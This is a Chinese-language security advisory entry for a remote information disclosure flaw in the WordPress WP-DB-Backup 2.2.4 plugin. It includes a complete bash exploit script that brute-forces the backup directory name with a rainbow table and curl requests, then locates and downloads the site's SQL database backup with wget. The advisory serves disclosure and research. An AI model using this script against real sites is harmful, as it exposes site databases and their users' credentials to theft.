WordPress WP-DB-Backup插件\'wp-db-backup.php\'远程信息泄露漏洞

BugTraq-ID:71177

发布日期：2014-11-19

更新日期：2014-11-21

受影响系统：

WordPress WP-DB-Backup 2.2.4

WordPress WP-DB-Backup

详细信息：

WP-DB-Backup插件可以备份核心WordPress数据库表。 WP-DB-Backup 2.2.4及其他版本在实现上存在远程信息泄露漏洞，远程攻击者可利用此漏洞获取敏感信息。

来源：

Larry Cashdollar

测试方法：

警 告以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！#!/bin/bash #Larry W. Cashdollar, @_larry0 #http://www.vapid.dhs.org/advisories/wordpress/plugins/wp-db-backup-v2.2.4/ #Usage: Compile raintable.c #gcc raintable.c -o table;./table > rainbow #run ./exp targetsite date #date is in format YYYYMMDD e.g 20141031 if [ ! -e found.txt ]; then Z=0 K=`wc -l rainbow|awk \'{print $1}\'`; echo "[+] Searching...."; for x in `cat rainbow`; do CPATH="http://$1/wp-content/backup-$x/"; RESULT=`curl -s --head $CPATH|grep 200`; if [ -n "$RESULT" ]; then echo "[+] Location $CPATH Found"; echo "[+] Received $RESULT"; echo $x > found.txt exit; #break here fi; echo -n "Percent Done: "; Y=`echo "scale=6;($Z/$K)*100"|bc`; echo -n $Y echo "%"; Z=$(( $Z + 1 )); done else x=`cat found.txt`; fi # Now that we have the directory lets try to locate the database backup file. K=999; for y in `seq -w 0 999`; do CPATH="http://$1/wp-content/backup-$x/wordpress_wp_$2_$y.sql"; RESULT=`curl -s --head $CPATH|grep 200`; if [ -n "$RESULT" ]; then echo "[+] Database backup $CPATH Found"; echo "[+] Received $RESULT"; wget $CPATH exit; #break here fi; echo -n "Percent Done: "; Y=`echo "scale=2;($Z/$K)*100"|bc`; echo -n $Y echo "%"; Z=$(( $Z + 1 )); done

解决办法：

厂商补丁：

WordPress

---------

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

https://wordpress.org/plugins/wp-db-backup/